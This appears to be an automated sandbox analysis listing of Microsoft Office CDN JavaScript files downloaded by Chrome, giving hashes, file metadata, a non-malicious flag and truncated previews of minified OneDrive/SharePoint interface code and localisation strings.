                              SSDEEP:
                              MD5:09417DFF8590166510120A56247CD2FF
                              SHA1:0688CEA4FF761FEC78ECCD7AC5A4686DEA6F18CB
                              SHA-256:FE838E8FA59E641845534E06A15978405DBA45F626E74A394A70AFA1A7FA9F7C
                              SHA-512:EAE5278021D61FF924A4AEF2E4E53C2EC022120792EB8D3D3A81E662BBCF44A9F6E6031EBB593562AE02A17A01E29F51815D7F625FFC96CCD8064A5E7B980849
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/odblightspeedwebpack/1029.js
                              Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[1029],{3231:function(e,t,n){n.d(t,{a:function(){return f}});var a=n("odsp.util_578"),i=n(2096),r=n(479),o=n(2520),s=n(2230),c=n(2110),d=n(2108),l=n(2156),u=function(){function e(e,t){this._appStateStore=t.appStateStore,this._customizationMap=t.customizationMap,this._listDataStateStore=t.listDataStateStore,this._currentListStore=t.currentListStore}return e.prototype.evaluateAction=function(e){var t,n=this,a=!(0,i.vb)()&&void 0!==this._customizationMap.get(o.a),r=a&&this._customizationMap.get(o.a)||!a,c=this._listDataStateStore.state.listRenderData.itemSet,d=this._currentListStore.state;return{id:"ShowHideColumns",isAvailable:!(!c||(0,s.a)(c)||!(null===(t=null==d?void 0:d.permissions)||void 0===t?void 0:t.managePersonalViews)||!r),onExecute:function(){n._appStateStore.update("panel",{publisher:"LaunchColumnsEditorPaneCommand",state:{name:"columnsEditor",props:void 0}})}}},e}(),f=(0,a.Yx)("ShowHideColumnsActionP
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:ASCII text, with very long lines (9783)
                              Category:downloaded
                              Size (bytes):2588698
                              Entropy (8bit):5.443903192078361
                              Encrypted:false
                              SSDEEP:
                              MD5:AD87FEFBC71C4D29539224156BA4564C
                              SHA1:16BE1DDFEEF4636509CAAE741B8209DA1BE1325F
                              SHA-256:6DA475DBAA51D6CCCA76E74382A062C76D6F9153B8280C7707D5CFE72A3C6CA4
                              SHA-512:88E76F845291F48DDB289E5E930C67AF672FD5F9FDDA62522A7A75BDF06C984FEA9FE3EBED755CDFBA909F5367B7C684D0F338984A6D5A6B28BBB9062AE77521
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/file-browser-spo-teams-lists/file-browser-spo-teams-lists.js
                              Preview:/*! For license information please see file-browser-spo-teams-lists.js.LICENSE.txt */.var __webpack_result__;(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([["file-browser-spo-teams-lists"],[,(e,t,n)=>{"use strict";n.d(t,{a:()=>o,b:()=>u,c:()=>l});var a=n("tslib_102"),i=n(0),r=n("fui.util_150"),o=function(e){function t(t,n){var i=e.call(this,"".concat(t,"Control"))||this;return i._reducer=function(e,t){return t&&e&&i._memoizer(t)(e)||t||e},i.controlOptions=n,i._memoizer=function(e){return(0,r.bQ)(function(t){return(0,r.bQ)(function(n){function i(i,r){var o=n(i,r),s={},c=(0,a.W_)({},r);for(var d in o)Object.prototype.hasOwnProperty.call(o,d)&&(s[d]=c[d]=o[d]);var l=t(i,c);for(var d in l)if(Object.prototype.hasOwnProperty.call(l,d)){var f=e[d];s[d]=f&&d in o&&f!==u?f.merge(o[d],l[d]):l[d]}return s}return i.previous=n,i.current=t,i})})}(n),i}return(0,a.XJ)(t,e),Object.defineProperty(t.prototype,"default",{get:function(){return c},enumerable:!1,configurable:!0}),t.get=funct
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:ASCII text, with very long lines (19679)
                              Category:downloaded
                              Size (bytes):110841
                              Entropy (8bit):5.423154670133033
                              Encrypted:false
                              SSDEEP:
                              MD5:29446FE4B1EE56B56D479CDF11405F4F
                              SHA1:EBB96C199E17DA43798CB88D76844E9E126144EA
                              SHA-256:F2E9DC441EC31A82576081ECAF431765B78B32D9D268739104E3E31CDC152FF9
                              SHA-512:D50998B937F31D4AA5EE408C235F6F5B3450605D28E965D2B2E1B9B42183165E1C52ADACCBC34F9715971B0B2752454813DA8C9852A5B6C38724CF71ABA574FE
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/listsenterprise/37.js
                              Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[37,107,81,216],{1387:(e,t,n)=>{n.d(t,{a:()=>p,b:()=>m});var a=n("tslib_102"),i=n(476),r=n(78),o=n(52),s=n(115),c=n(827),d=n(42),l=n(1386),u=n(54),f=n("odsp.util_578").HW.isActivated("29873e89-d94c-4bb0-8f5b-dfd437f6422c","6/19/2021","Look for filters within the folder structure for doclib by using GetListUsingPath API"),p=function(e){function t(t){var n=e.call(this,{},{pageContext:t.pageContext})||this;return n._listContext=t.listContext,n._itemUrlHelper=t.itemUrlHelper||new s.a({},{pageContext:t.pageContext}),n._apiUrlHelper=t.apiUrlHelper||new c.a({},{pageContext:t.pageContext,itemUrlHelper:n._itemUrlHelper}),n._folderPath=t.folderPath,void 0===n._folderPath&&(n._folderPath=(0,l.b)(t.parentKey,n._listContext)),n}return(0,a.XJ)(t,e),t.prototype.getFilterData=function(e,t,n,a){var i=this;return this.getData(function(){return i._getFilterDataUrl(e,t,n,a)},function(e){return e},"GetFilterData")},t.prototype._ge
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:ASCII text, with very long lines (1937)
                              Category:downloaded
                              Size (bytes):1942
                              Entropy (8bit):5.245498315456374
                              Encrypted:false
                              SSDEEP:
                              MD5:4BF53E2C9D05C40362E388B08ECCA760
                              SHA1:D35A846559665B733D9F34CED22AE6916E1755E1
                              SHA-256:2989F0AB5E05A8D1E82A029EF3B4ECBA4227C1A1973D3034B7806C7AB2B5B1EF
                              SHA-512:F866DB282759D3A11C06BDDEFAD5901AA4C18F7885574F3623D9D15EE7E424C3B9598D150E3D57D8287A0B6D0F9759FFBC4AE27D592CFC2A6D45A337C3F56D12
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/listsenterprise/170.js
                              Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[170],{2023:(e,t,n)=>{n.r(t),n.d(t,{CoachmarkPulse:()=>l,default:()=>u});var a=n("react-lib"),i=n("react-dom-lib"),r=n("fui.lco_35"),o=n(270),s=n("fui.core_238"),c=n(256),d=n(96),l=a.memo(function(e){var t=(0,r.M94)(),n=a.useState(void 0),l=n[0],u=n[1],f=a.useState(void 0),p=f[0],m=f[1],_=e.coachmarkConfig,h=_.directionalHint,b=_.offsetFromTarget,g=a.useRef(new d.a),v=a.useRef(),y=a.useRef();a.useEffect(function(){return l&&v.current&&(v.current=new MutationObserver(g.current.throttle(function(){document.body.contains(l)||u(void 0)},100)),v.current.observe(document.documentElement||document.body,{childList:!0,subtree:!0})),function(){var e;null===(e=v.current)||void 0===e||e.disconnect()}},[l]),a.useEffect(function(){var e=g;return v.current=c.a.waitForElement(_.coachmarkTarget,function(e){g.current.setTimeout(function(){u(e)},100)}),_.coachmarkRenderHost?y.current=c.a.waitForElement(_.coachmarkRenderHost,func
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:ASCII text, with very long lines (683)
                              Category:downloaded
                              Size (bytes):688
                              Entropy (8bit):5.2892113568409975
                              Encrypted:false
                              SSDEEP:
                              MD5:D031E82D79C0F171EB831A4CB1C451A2
                              SHA1:DDF6BD00917FD0DD243D46EF56F769B99A1FE693
                              SHA-256:40CCEB69691E1701B5DCCAA3F13A2F3973AC6888159646DA02FAE8A00B21F948
                              SHA-512:541483A40B3F3978AB2CF3313BA41CED5D27D47DFF3A4768CE986C20F1A626AFB784407ACFB09E9358D7A69FAB0962482F898742F0D00210F3793F0767A42699
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/file-browser-odb-meta-os/941.js
                              Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[941],{3712:(e,t,n)=>{n.r(t),n.d(t,{resourceKey:()=>u});var a=n(5696),i=n(42),r=n(5785),o=n(22),s=n(5464),c=n(12),d=n(1224),l=n(299),u=new o.b({name:"DropActionControlHandler",factory:new o.a(function(e,t){if((0,c.Kh)(c.gh))return{};if(t.handlers&&function(e,t){var n=(0,l.a)(e);if(n&&t.itemKey){var o=(0,d.a)(e,{itemKey:t.itemKey}).itemKey;if(o){var s=a.a.deserialize(o).webAbsoluteUrl;return new r.a({},{pageContext:n}).getUrlParts({webUrl:s}).geoRelation===i.a.crossGeo}}return!1}(e,t)){for(var n=[],o=0,u=t.handlers;o<u.length;o++){var f=u[o];f.key!==s.a.key&&n.push(f)}return{handlers:n}}return{}})})}.}]);
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:ASCII text, with very long lines (14683)
                              Category:downloaded
                              Size (bytes):27741
                              Entropy (8bit):5.359228701065018
                              Encrypted:false
                              SSDEEP:
                              MD5:3459E0529F47F6C20AA372620EEBB0E0
                              SHA1:EABEA5C9700BDF16FBE66510D5D47EDC49E59B2E
                              SHA-256:B5B54DC58EC8D16C16E225EE4AEE6C571827AFDB356D61846A6ACFD5763D151E
                              SHA-512:92255BC62BFB62D058B5EC794D609393E3C5F7C9E340E619F366FB44861DF9B2C2C939507C0D71E74E788FF3C593F47F338A1DA04B6FE8249F532F264FF0D004
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/listsenterprise/204.js
                              Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[204],{1868:(e,t,n)=>{n.d(t,{a:()=>p});var a=n("tslib_102"),i=n("react-lib"),r=n("fui.lcoms_307"),o=n("fui.lco_35"),s=n(1869);(0,n("fui.util_150").pZ)([{rawString:".commandButton_b82d8add{font-size:14px;font-weight:inherit;line-height:100%}[dir=ltr] .commandButton_b82d8add .spinner_b82d8add{margin-left:10px}[dir=rtl] .commandButton_b82d8add .spinner_b82d8add{margin-right:10px}"}]);var c=n(866),d=n(870),l=n(1864),u=n(1872);function f(e){var t=e.items.filter(function(e){return e&&(!!e.shortcutProps||!!e.keytipProps)});return i.createElement(i.Fragment,null,t&&t.length>0&&t.map(function(e){var t=e.shortcutProps||e.keytipProps;return t&&t.keySequences.length>0&&e.onClick?i.createElement(u.a,{key:e.key,keySequences:t.keySequences,description:t.content,onExecute:e.onClick}):null}))}var p=(0,c.c)(function(e,t){var n=t.commands,c=t.direction,u=void 0===c?"horizontal":c,p=(0,a.l7)(t,["commands","direction"]);return(0,d
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:ASCII text, with very long lines (1745)
                              Category:downloaded
                              Size (bytes):2002
                              Entropy (8bit):5.342208597306847
                              Encrypted:false
                              SSDEEP:
                              MD5:3DC8EC00D87ED26AE8C4FF8435DDADCD
                              SHA1:0C66B0A17A47628E386951587591C9FFADC24E89
                              SHA-256:B01B371107340AC7857C4491607AE24A4418369D4777D797ED46342E6A54698D
                              SHA-512:8EC9C1345429E8344ADD051C529E9BE042593D1253D6DF2AECE9738D1E9B78E848155689EF40E6C7977098C92B082FCE765127FD7C3D811314543CCA6B345003
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/listsenterprise/226.js
                              Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[226],{1543:(e,t,n)=>{n.d(t,{a:()=>r,b:()=>a,c:()=>i,d:()=>o});var a=320,i={styles:{main:{minHeight:"auto"}}},r={showCloseButton:!0};function o(e){e&&(e.focus(),e.select())}}.,2031:(e,t,n)=>{n.r(t),n.d(t,{SaveViewDialog:()=>d});var a=n("tslib_102"),i=n("react-lib"),r=n(34),o=n(2100),s=n(1543),c=n("odsp.util_578");function d(e){var t=this,n=e.onComplete,d=e.onError,l=(0,i.useState)(e.currentViewName),u=l[0],f=l[1],p=(0,i.useState)(e.currentViewIsPublic),m=p[0],_=p[1],h=(0,i.useState)(!0),b=h[0],g=h[1],v=r.a.Dialog,y=r.a.DialogFooter,S=r.a.PrimaryButton,D=r.a.DefaultButton,I=r.a.TextField,x=r.a.Checkbox,C=function(){d(new c.$6({code:"Dismissed"}))},O=function(){return(0,a.Zd)(t,void 0,void 0,function(){var t;return(0,a.qr)(this,function(a){switch(a.label){case 0:return a.trys.push([0,5,,6]),u!==e.currentViewName?[3,2]:[4,e.onSaveCurrentView()];case 1:return a.sent(),[3,4];case 2:return[4,e.onCreateNewView(u,m)];
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:ASCII text, with very long lines (25834)
                              Category:downloaded
                              Size (bytes):28716
                              Entropy (8bit):5.282430740669768
                              Encrypted:false
                              SSDEEP:
                              MD5:D4A307627DACCD3C2B3DA1926DB8CE91
                              SHA1:0553778B19DBEC482A199CFF3B85E6B415F421A0
                              SHA-256:0D10B472B58307720517720C1FEE862CD8D5E35A4DC80E6CFD33BB3D3114B1D6
                              SHA-512:D77ED93CFD08638093B91FC9C541F42EE7D265C4DD0ED382E795DBBB40563702DE54FC5847A0CEB0CA2176879AE7BB2447212FA2258CCF43997E17D38B0FD1EE
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/@ms/stream-bundle/chunks/1733.js
                              Preview:"use strict";(self.webpackChunk_ms_stream_bundle=self.webpackChunk_ms_stream_bundle||[]).push([[1733],{14813:(e,t,n)=>{n.d(t,{h:()=>m});var a=n(408156);function i(e,t){if(!e)return;const n=e;n._virtual||(n._virtual={}),n._virtual.parent=t}var r=n(911746),o=n(86862);const s=a.createContext(void 0);s.Provider;var c=n(718799),d=n(501544),l=n(937696);const u=(0,n(550948).s)({root:{qhf8xq:"f1euv43f",Bhzewxz:"f15twtuk",oyh7mz:["f1vgc2s3","f1e31b4d"],j35jbq:["f1e31b4d","f1vgc2s3"],Bj3rh1h:"f494woh"}},{d:[".f1euv43f{position:absolute;}",".f15twtuk{top:0;}",".f1vgc2s3{left:0;}",".f1e31b4d{right:0;}",".f494woh{z-index:1000000;}"]}),f=a.useInsertionEffect;var p=n(447111);const m=e=>{return t=(e=>{const{element:t,className:n}=function(e){return(0,r.R)(e)?{element:e}:"object"==typeof e?null===e?{element:null}:e:{}}(e.mountNode),p=a.useRef(null),m=(e=>{const{targetDocument:t,dir:n}=(0,o.O)(),i=a.useContext(s),r=(0,l._)(),p=u(),m=(0,c.H)(),_=(0,d.z)(m,p.root,e.className),h=null!=i?i:null==t?void 0:t.
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:ASCII text, with very long lines (21592)
                              Category:downloaded
                              Size (bytes):46237
                              Entropy (8bit):5.44428897838186
                              Encrypted:false
                              SSDEEP:
                              MD5:9FD52A0C1D67E04B3946C70EF8755A7C
                              SHA1:973915C92C5F89E945472EA7735FB28F74B03540
                              SHA-256:12C3E8F1C92FB0EFED95DE5CAD2B7BD9BE2E701D1A5C7D8D891F2A4C738B16ED
                              SHA-512:B7432EF077E2BD3FB0BE01FE6960AD48A089ED6BC66B326846BC02E5648545B0E438D9D97474B2CCAA0D8AA99B6E48D1C2583023B648FA4C96A42215E8CFBC19
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/metaosfilebrowser/33.js
                              Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[33,727],{2581:(e,t,n)=>{function a(e){return!function(e){return!!e.RemoteItem}(e)&&1===Number(e["Created_x0020_Date.ifnew"])}function i(e){var t=Number(e._VirusStatus)||0;return 0!==t&&3!==t}n.d(t,{a:()=>i,b:()=>a})}.,772:(e,t,n)=>{n.d(t,{a:()=>r,b:()=>i,c:()=>o});var a=n(3643),i={NONE:0,COUNT:1,AVG:2,MAX:3,MIN:4,SUM:5,STDEV:6,VAR:7},r=["NONE","COUNT","AVG","MAX","MIN","SUM","STDEV","VAR"];function o(e){return e=e?e.toUpperCase():e,a[e]||""}}.,941:(e,t,n)=>{n.d(t,{a:()=>d,b:()=>l,c:()=>u,d:()=>p});var a=n(599),i=n(5509),r=n(5940),o=n(3642),s=n("odsp.util_578"),c=n(772);function d(e,t,n,a){for(var i=[],r=0,o=void 0,s=void 0,c=(n=n||t.groupBy)[0],d=n[1],l=0,f=e;l<f.length;l++){var p=f[l];if(c&&"1"===p[c+".newgroup"]){var m=u(t,p,c,0,!0,r,void 0,a);i.push(m),r+=m.count,o=m,s=void 0}d&&"1"===p[d+".newgroup"]&&(s=u(t,p,d,1,!0,s?s.startIndex+s.count:o?o.startIndex:0,o,a))}return{groups:i,totalCount:r}}function l(e,
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:Unicode text, UTF-8 text, with very long lines (12199)
                              Category:downloaded
                              Size (bytes):592473
                              Entropy (8bit):4.974918044710534
                              Encrypted:false
                              SSDEEP:
                              MD5:2BC466AD84923E7CD4D63990C521E376
                              SHA1:07ED717B84646018B306C2CDD98063DAF5506705
                              SHA-256:FB5CF297CA7ADBC5B800D8BCB88FFC4A5C18F7BD293A6FF8956A092623A3E342
                              SHA-512:8D8BE8A4726683E149112179DCB3DBF1FDB880CCE2E27FAE743BB44BC518DBD24E8F72C937C540384A89E48F425B01E004286DBB07196D5E2504D3CDE671320E
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/file-browser-spo-teams-lists/es/ondemand.resx.js
                              Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([["ondemand.resx"],{6695:e=>{e.exports=JSON.parse('{"a":"EnvironmentType is invalid","b":"Invalid GUID string: \\u0022{0}\\u0022","f":"The value for \\u0022{0}\\u0022 is false","g":"The value for \\u0022{0}\\u0022 must not be null","h":"The value for \\u0022{0}\\u0022 must not be undefined","e":"The value for \\u0022{0}\\u0022 must not be an empty string","d":"The \\u0022{0}\\u0022 object cannot be used because it has been disposed.","c":"Invalid version string: \\u0022{0}\\u0022","j":"Cannot consume services because the scope is not finished yet","k":"Cannot consume services during ServiceScope autocreation","i":"The ServiceScope is already finished","l":"Cannot register service because the scope is already finished","m":"The service key \\u0022{0}\\u0022 has already been registered in this scope","o":"INNERERROR:","n":"CALLSTACK:","p":"LOGPROPERTIES:"}')}.,7491:e=>{e.exports=JSON.parse('{"a":"A source with id
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:ASCII text, with very long lines (2365)
                              Category:downloaded
                              Size (bytes):8190
                              Entropy (8bit):5.23923538232022
                              Encrypted:false
                              SSDEEP:
                              MD5:74BBACF1D665776024D88E126EF1E8EB
                              SHA1:379D95518EAA84E26DB9C2D7D1595A6F7E5DE5A3
                              SHA-256:89712E0BD242799996B09E887036FD62D28CF97718479E88FFA9D67DB74BF757
                              SHA-512:37FC8CF3F5A95D714AEDBEBC08BEFCAC594BC506BA206DF8C0336B42FEDCCF7FE18B292351BFCE9AD3168999ED2BF16BC4C5C2711FC93FEB75E06F1F24EEC603
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/metaosfilebrowser/17.js
                              Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[17],{329:(e,t,n)=>{n.d(t,{a:()=>s});var a=n("tslib_102"),i=n("fui.util_150"),r=n(153),o=n(374);const s=function(e){function t(t){var n,a,i,r=e.call(this,t)||this,s=t.valueAccessor();!function(e){return"object"==typeof e}(s)?i=s:(n=s.isBodyActive,a=s.activeElement,i=s.isDescendantOrSelfActive),r._focusTracker=r.resources.consume(o.a);var c=r.observables;if(i){var d=c.pureCompute(r._computeIsDescendantOrSelfActive);c.compute(function(){i(d())}).extend({deferred:!0})}if(n){var l=c.pureCompute(r._computeIsBodyActive);c.compute(function(){n(l())}).extend({deferred:!0})}if(a){var u=c.pureCompute(r._computeActiveElement);c.compute(function(){a(u())}).extend({deferred:!0})}return r}return(0,a.XJ)(t,e),t.prototype._computeIsDescendantOrSelfActive=function(){var e=this.element,t=this._focusTracker.activeElement();return!!t&&(e===t||(0,i.tw)(e,t))},t.prototype._computeIsBodyActive=function(){var e=this._focusTracker.act
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:ASCII text, with very long lines (529)
                              Category:downloaded
                              Size (bytes):786
                              Entropy (8bit):5.177295805416332
                              Encrypted:false
                              SSDEEP:
                              MD5:1F46EA7404347C864A3F83B4D50BC54E
                              SHA1:719BF04C572523373E27F438E5083C6E363738FA
                              SHA-256:4264921EDA4CFB19F59737FFBEE56CC72522989CD571897E2921BFA97D6FC976
                              SHA-512:A873E9A64E36CDA8EF1C137A5B17782297FB871681E609A95A1FF561933F5815A2E2B81A3F189630AD1C28F83A451695ED58908FCDA9FD907E9CA385D30445C4
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/listsenterprise/224.js
                              Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[224],{1543:(e,t,n)=>{n.d(t,{a:()=>r,b:()=>a,c:()=>i,d:()=>o});var a=320,i={styles:{main:{minHeight:"auto"}}},r={showCloseButton:!0};function o(e){e&&(e.focus(),e.select())}}.,2029:(e,t,n)=>{n.r(t),n.d(t,{DeleteViewDialog:()=>c});var a=n("tslib_102"),i=n("react-lib"),r=n(34),o=n(2100),s=n(1543);function c(e){var t=r.a.Dialog,n=r.a.DialogFooter,c=r.a.PrimaryButton,d=r.a.DefaultButton,l=(0,a.W_)({title:o.c},s.a);return i.createElement(t,{hidden:!1,dialogContentProps:l,onDismiss:e.onDismiss,minWidth:s.b,modalProps:s.c},o.d,i.createElement(n,null,i.createElement(c,{text:o.b,onClick:function(){e.onDeleteCurrentView(),e.onDismiss()}}),i.createElement(d,{text:o.a,onClick:function(){e.onDismiss()}})))}}.}]);
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:Unicode text, UTF-8 text, with very long lines (21309)
                              Category:downloaded
                              Size (bytes):70184
                              Entropy (8bit):4.979870953515554
                              Encrypted:false
                              SSDEEP:
                              MD5:A8EC9F69994A5612C9E6A308399F6072
                              SHA1:95B5DD6E36395FAD86388CD229026DEDB48E848A
                              SHA-256:7053B18F624D66B7C6E2A3DA3185143F3AF19CD4DD7732A615EB148DB2220E65
                              SHA-512:2A19EBA817EC8A9FA739F8D701EE8329B872EFAAEB8A39E64FBB4D70C573A1D1A77AFFD65D1E57C3E600C08C0344F2E7451DFC728FD4FABFE78171A0E03BB056
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/file-browser-odb-teams/es/initial.resx.js
                              Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([["initial.resx"],{788:e=>{e.exports=JSON.parse('{"a":"Se ha producido un error","c":"Pruebe a actualizar la p.gina","b":"Se ha producido un error y no se pudo mostrar la p.gina."}')}.,1640:e=>{e.exports=JSON.parse('{"a":"Abrir en el Lector inmersivo"}')}.,277:e=>{e.exports=JSON.parse('{"b":"A.adir acceso directo a Mis archivos","d":"Agregar acceso directo a OneDrive","n":"Quitar","p":"Quitar el m.todo abreviado de Mis archivos","y":"Quitar de mi lista compartida","a":"Agregar un acceso directo a esta carpeta en Mis archivos","o":"Quitar los accesos directos a esta carpeta de Mis archivos","c":"Agregar acceso directo a esta carpeta en OneDrive","m":"Quitar los accesos directos seleccionados de esta ubicaci.n","f":"Agregar acceso directo a .lbumes","e":"Agregar un acceso directo a este .lbum compartido en .lbumes","k":"Abrir ubicaci.n del archivo","t":"Fecha","s":"Cualquier fecha","u":".ltimas 24 horas
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:ASCII text, with very long lines (5278)
                              Category:downloaded
                              Size (bytes):5665
                              Entropy (8bit):5.316110655662692
                              Encrypted:false
                              SSDEEP:
                              MD5:902495F154EB71347452F3221E818748
                              SHA1:A3E479B606EB4AD49F2CFF7F1AA3648AC97AA713
                              SHA-256:9282E057C6E80E14AAAE2D966EF45760B4394E9448F2768485E17FBCC5F6E5B5
                              SHA-512:B4EC20DCB4558EB493C1B196622AA2BE3C2D6027EBD11C86B07B2869007A98388D3104F618E68BAABEC92AFF24532229F1ACB0912B2B146355C8FEDDDE764B0D
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/listsenterprise/74.js
                              Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[74],{1759:(e,t,n)=>{function a(e){return/^0x0120/i.test(e)}function i(e){return/^0x012000.{32}$/i.test(e)}function r(e){return/^0x0120D520/i.test(e)}n.d(t,{a:()=>i,b:()=>r,c:()=>a})}.,1011:(e,t,n)=>{n.d(t,{a:()=>a});var a={id:n(11).i,getCommand:function(){return{isDivider:!0,action:{isAvailable:!0}}}}}.,689:(e,t,n)=>{n.r(t),n.d(t,{newSubCommandKey:()=>N});var a=n("odsp.util_578"),i=n(15),r=n(19),o=n(50),s=n(14),c=n(58),d=n(91),l=a.HW.isActivated("7fbafee3-fe85-4f7b-8771-bc581ef63ab0"),u="NewListItemCommand",f=new a.qT({name:"NewListItemCommand",factory:{dependencies:{resources:a.lh,userListPermissions:o.a,listDataStateStore:s.a},create:function(e){var t=e.resources,n=e.userListPermissions,a=e.listDataStateStore;return{instance:{id:u,getCommand:function(){var e=!1;if(!l){var o=a.state.listRenderData.itemSet,s=void 0;o&&o.rootFolderItem&&(s=o.rootFolderItem),e=!!s&&(0,c.a)(i.a.insertListItems,s)}return{action:{
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:Unicode text, UTF-8 text, with very long lines (11293)
                              Category:downloaded
                              Size (bytes):460025
                              Entropy (8bit):5.0391452414152
                              Encrypted:false
                              SSDEEP:
                              MD5:AB6CC1260C4903D24F2D158669516380
                              SHA1:FE86AF28F541DFC6C7262D228E3432ED2C38B2A8
                              SHA-256:584D6A215A6D5FB65B53CD96CC2A59F5F5060223ADAEE6110E4DAC7537CA6039
                              SHA-512:8BD4A5A268F0FFFE6998B98F31DA60C1EE6BA59B54194AA87EEFA81F30F7781A9A0595E3ABC3120E319D9F98D33734AB0D11C3227DDFA99E7F407D8DCC621F8F
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/file-browser-odb-teams/en-gb/ondemand.resx.js
                              Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([["ondemand.resx"],{6474:e=>{e.exports=JSON.parse('{"a":"EnvironmentType is invalid","b":"Invalid GUID string: \\u0022{0}\\u0022","f":"The value for \\u0022{0}\\u0022 is false","g":"The value for \\u0022{0}\\u0022 must not be null","h":"The value for \\u0022{0}\\u0022 must not be undefined","e":"The value for \\u0022{0}\\u0022 must not be an empty string","d":"The \\u0022{0}\\u0022 object cannot be used because it has been disposed.","c":"Invalid version string: \\u0022{0}\\u0022","j":"Cannot consume services because the scope is not finished yet","k":"Cannot consume services during ServiceScope autocreation","i":"The ServiceScope is already finished","l":"Cannot register service because the scope is already finished","m":"The service key \\u0022{0}\\u0022 has already been registered in this scope","o":"INNERERROR:","n":"CALLSTACK:","p":"LOGPROPERTIES:"}')}.,7214:e=>{e.exports=JSON.parse('{"a":"A source with id
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:ASCII text, with very long lines (2370)
                              Category:downloaded
                              Size (bytes):8234
                              Entropy (8bit):5.228128889480793
                              Encrypted:false
                              SSDEEP:
                              MD5:40066F49DA96566E868C6C3E54AB8ADD
                              SHA1:F3C8C9F2D6CACCE9D7511EBB46A6C48372B3B072
                              SHA-256:E4DB732BBE5DE9957855338A3898714EF59AC23CC7504CAFA1D124C2BDB8A519
                              SHA-512:9E5A93D7F682C6A5801A2C03F82F585F63A14AD05B05741AA34EE5166CD502E90015F81578F59705134C0635DF5525DB0C05AD8C831B27602660C26144CB0401
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/odblightspeedwebpack/5.js
                              Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[5],{2314:function(e,t,n){var a=n("tslib_102"),i=n("fui.util_150"),r=n(2091),o=n(2389),s=function(e){function t(t){var n,a,i,r=e.call(this,t)||this,s=t.valueAccessor();!function(e){return"object"==typeof e}(s)?i=s:(n=s.isBodyActive,a=s.activeElement,i=s.isDescendantOrSelfActive),r._focusTracker=r.resources.consume(o.a);var c=r.observables;if(i){var d=c.pureCompute(r._computeIsDescendantOrSelfActive);c.compute(function(){i(d())}).extend({deferred:!0})}if(n){var l=c.pureCompute(r._computeIsBodyActive);c.compute(function(){n(l())}).extend({deferred:!0})}if(a){var u=c.pureCompute(r._computeActiveElement);c.compute(function(){a(u())}).extend({deferred:!0})}return r}return(0,a.XJ)(t,e),t.prototype._computeIsDescendantOrSelfActive=function(){var e=this.element,t=this._focusTracker.activeElement();return!!t&&(e===t||(0,i.tw)(e,t))},t.prototype._computeIsBodyActive=function(){var e=this._focusTracker.activeElement();re
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:ASCII text, with very long lines (1990)
                              Category:downloaded
